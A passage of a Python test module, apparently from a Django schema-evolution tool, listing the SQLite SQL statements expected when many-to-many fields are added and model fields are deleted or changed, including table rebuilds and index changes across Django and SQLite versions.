                ' REFERENCES "tests_testmodel" ("id"),'
                ' "addanchor2_id" integer NOT NULL'
                ' REFERENCES "custom_add_anchor_table" ("id")'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE UNIQUE INDEX "%s" ON'
                ' "tests_testmodel_added_field"'
                ' ("testmodel_id", "addanchor2_id");'
                % generate_unique_constraint_name(
                    'tests_testmodel_added_field',
                    ['testmodel_id', 'addanchor2_id']),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("addanchor2_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'addanchor2_id'),
            ],
            'AddManyToManySelf': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "from_testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id"),'
                ' "to_testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id")'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE UNIQUE INDEX "%s" ON "tests_testmodel_added_field"'
                ' ("from_testmodel_id", "to_testmodel_id");'
                % generate_unique_constraint_name(
                    'tests_testmodel_added_field',
                    ['from_testmodel_id', 'to_testmodel_id']),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("from_testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'from_testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("to_testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'to_testmodel_id'),
            ],
        })
    elif django_version >= (1, 7):
        # Django 1.7–1.8: the unique constraint is inline in the CREATE
        # TABLE instead of a separate UNIQUE INDEX.
        mappings.update({
            'AddManyToManyDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id"),'
                ' "addanchor1_id" integer NOT NULL'
                ' REFERENCES "tests_addanchor1" ("id"),'
                ' UNIQUE ("testmodel_id", "addanchor1_id")'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("addanchor1_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'addanchor1_id'),
            ],
            'AddManyToManyNonDefaultDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id"),'
                ' "addanchor2_id" integer NOT NULL'
                ' REFERENCES "custom_add_anchor_table" ("id"),'
                ' UNIQUE ("testmodel_id", "addanchor2_id")'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("addanchor2_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'addanchor2_id'),
            ],
            'AddManyToManySelf': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "from_testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id"),'
                ' "to_testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id"),'
                ' UNIQUE ("from_testmodel_id", "to_testmodel_id")'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("from_testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'from_testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("to_testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'to_testmodel_id'),
            ],
        })
    else:
        # Django < 1.7: SQL is split into one string per line, and no
        # indexes are created on the FK columns.
        mappings.update({
            'AddManyToManyDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" (',
                ' "id" integer NOT NULL PRIMARY KEY%s,'
                % get_field_suffix('AutoField'),
                ' "testmodel_id" integer NOT NULL,',
                ' "addanchor1_id" integer NOT NULL,',
                ' UNIQUE ("testmodel_id", "addanchor1_id")',
                ')',
                ';',
            ],
            'AddManyToManyNonDefaultDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" (',
                ' "id" integer NOT NULL PRIMARY KEY%s,'
                % get_field_suffix('AutoField'),
                ' "testmodel_id" integer NOT NULL,',
                ' "addanchor2_id" integer NOT NULL,',
                ' UNIQUE ("testmodel_id", "addanchor2_id")',
                ')',
                ';',
            ],
            'AddManyToManySelf': [
                'CREATE TABLE "tests_testmodel_added_field" (',
                ' "id" integer NOT NULL PRIMARY KEY%s,'
                % get_field_suffix('AutoField'),
                ' "from_testmodel_id" integer NOT NULL,',
                ' "to_testmodel_id" integer NOT NULL,',
                ' UNIQUE ("from_testmodel_id", "to_testmodel_id")',
                ')',
                ';',
            ],
        })
    return mappings
def delete_field(connection):
    """SQL test statements for the DeleteFieldTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
        The dictionary of SQL mappings.
    """
    generate_index_name = make_generate_index_name(connection)

    # Dropping a column on SQLite is a full table rebuild (CREATE temp,
    # INSERT ... SELECT, DROP, RENAME); dropping a many-to-many field
    # just drops its join table.
    return {
        'DefaultNamedColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "non-default_db_column" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "fk_field1_id" integer NOT NULL'
            ' REFERENCES "tests_deleteanchor1" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "char_field", "non-default_db_column", "int_field3",'
            ' "fk_field1_id")'
            ' SELECT "my_id", "char_field", "non-default_db_column",'
            ' "int_field3", "fk_field1_id"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field1_id");'
            % generate_index_name('tests_testmodel', 'fk_field1_id',
                                  'fk_field1'),
        ],
        'NonDefaultNamedColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "fk_field1_id" integer NOT NULL'
            ' REFERENCES "tests_deleteanchor1" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "char_field", "int_field", "int_field3",'
            ' "fk_field1_id")'
            ' SELECT "my_id", "char_field", "int_field", "int_field3",'
            ' "fk_field1_id"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field1_id");'
            % generate_index_name('tests_testmodel', 'fk_field1_id',
                                  'fk_field1'),
        ],
        'ConstrainedColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "non-default_db_column" integer NOT NULL,'
            ' "fk_field1_id" integer NOT NULL'
            ' REFERENCES "tests_deleteanchor1" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "char_field", "int_field", "non-default_db_column",'
            ' "fk_field1_id")'
            ' SELECT "my_id", "char_field", "int_field",'
            ' "non-default_db_column", "fk_field1_id"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field1_id");'
            % generate_index_name('tests_testmodel', 'fk_field1_id',
                                  'fk_field1'),
        ],
        'DefaultManyToManyModel': [
            'DROP TABLE "tests_testmodel_m2m_field1";',
        ],
        'NonDefaultManyToManyModel': [
            'DROP TABLE "non-default_m2m_table";',
        ],
        'DeleteForeignKeyModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "non-default_db_column" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "char_field", "int_field", "non-default_db_column",'
            ' "int_field3")'
            ' SELECT "my_id", "char_field", "int_field",'
            ' "non-default_db_column", "int_field3"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'DeleteColumnCustomTableModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_value" varchar(20) NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "alt_value")'
            ' SELECT "id", "alt_value"'
            ' FROM "custom_table_name";',
            'DROP TABLE "custom_table_name";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "custom_table_name";',
        ],
    }
def change_field(connection):
    """SQL test statements for the ChangeFieldTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
            The dictionary of SQL mappings.
    """
    generate_index_name = make_generate_index_name(connection)

    # SQLite cannot alter most column attributes in place, so nearly every
    # change below is expected to rebuild the table: create "TEMP_TABLE"
    # with the new schema, copy the rows over, drop the old table, rename
    # the temporary table back, and re-create any indexes.
    mappings = {
        'SetNotNullChangeModelWithConstant': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NOT NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            # NULL values are backfilled with the constant initial value
            # (note the escaped quote inside the SQL string literal).
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' coalesce("char_field1", \'abc\\\'s xyz\'), "char_field2",'
            ' "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'SetNotNullChangeModelWithCallable': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NOT NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            # The callable initial value selects "char_field" in place of
            # "char_field1" when copying rows.
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'SetNullChangeModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],

        # Changes that don't affect the schema emit no SQL at all.
        'NoOpChangeModel': [],

        'IncreasingMaxLengthChangeModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(45) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'DecreasingMaxLengthChangeModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(1) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'M2MNullChangeModel': [],

        # M2M table changes only rename the intermediary table.
        'M2MDBTableChangeModel': [
            'ALTER TABLE "change_field_non-default_m2m_table"'
            ' RENAME TO "custom_m2m_db_table_name";',
        ],

        # Index-only changes don't require a table rebuild.
        'AddDBIndexChangeModel': [
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field2");'
            % generate_index_name('tests_testmodel', 'int_field2'),
        ],
        'AddDBIndexNoOpChangeModel': [],
        'RemoveDBIndexChangeModel': [
            'DROP INDEX "%s";'
            % generate_index_name('tests_testmodel', 'int_field1')
        ],
        'RemoveDBIndexNoOpChangeModel': [],

        'AddUniqueChangeModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL UNIQUE,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'RemoveUniqueChangeModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'MultiAttrSingleFieldChangeModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(35) NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],

        # SQLite doesn't encode precision/scale in the column type, so the
        # decimal changes below still rebuild with the same schema.
        'decimal_field_decimal_places': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'decimal_field_decimal_places_max_digits': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
        'decimal_field_max_digits': [
            'CREATE TABLE "TEMP_TABLE" '
            '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "alt_pk" integer NOT NULL,'
            ' "custom_db_column" integer NOT NULL,'
            ' "int_field1" integer NOT NULL,'
            ' "int_field2" integer NOT NULL,'
            ' "int_field3" integer NOT NULL UNIQUE,'
            ' "int_field4" integer NOT NULL,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "char_field1" varchar(25) NULL,'
            ' "char_field2" varchar(30) NOT NULL,'
            ' "dec_field" decimal NOT NULL,'
            ' "dec_field1" decimal NULL,'
            ' "dec_field2" decimal NOT NULL);',
            'INSERT INTO "TEMP_TABLE"'
            ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2")'
            ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
            ' "int_field2", "int_field3", "int_field4", "char_field",'
            ' "char_field1", "char_field2", "dec_field", "dec_field1",'
            ' "dec_field2"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
            % generate_index_name('tests_testmodel', 'int_field1'),
        ],
    }

    if sqlite_version >= (3, 26):
        # Newer SQLite supports ALTER TABLE ... RENAME COLUMN, so column
        # renames don't need a full table rebuild.
        mappings.update({
            'DBColumnChangeModel': [
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "custom_db_column" TO "customised_db_column";',
            ],
            'MultiAttrChangeModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "alt_pk" integer NOT NULL,'
                ' "custom_db_column" integer NOT NULL,'
                ' "int_field1" integer NOT NULL,'
                ' "int_field2" integer NOT NULL,'
                ' "int_field3" integer NOT NULL UNIQUE,'
                ' "int_field4" integer NOT NULL,'
                ' "char_field" varchar(35) NOT NULL,'
                ' "char_field1" varchar(25) NULL,'
                ' "char_field2" varchar(30) NULL,'
                ' "dec_field" decimal NOT NULL,'
                ' "dec_field1" decimal NULL,'
                ' "dec_field2" decimal NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2")'
                ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
                'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
                'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
                % generate_index_name('tests_testmodel', 'int_field1'),
                # The column rename itself happens after the rebuild.
                'ALTER TABLE "tests_testmodel"'
                ' RENAME COLUMN "custom_db_column" TO "custom_db_column2";',
            ],
            'RedundantAttrsChangeModel': [
                'CREATE TABLE "TEMP_TABLE" '
                '("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
                ' "alt_pk" integer NOT NULL,'
                ' "custom_db_column" integer NOT NULL,'
                ' "int_field1" integer NOT NULL,'
                ' "int_field2" integer NOT NULL,'
                ' "int_field3" integer NOT NULL UNIQUE,'
                ' "int_field4" integer NOT NULL,'
                ' "char_field" varchar(35) NOT NULL,'
                ' "char_field1" varchar(25) NULL,'
                ' "char_field2" varchar(30) NULL,'
                ' "dec_field" decimal NOT NULL,'
                ' "dec_field1" decimal NULL,'
                ' "dec_field2" decimal NOT NULL);',
                'INSERT INTO "TEMP_TABLE"'
                ' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2")'
                ' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
                ' "int_field2", "int_field3", "int_field4", "char_field",'
                ' "char_field1", "char_field2", "dec_field", "dec_field1",'
                ' "dec_field2"'
                ' FROM "tests_testmodel";',
                'DROP TABLE "tests_testmodel";',
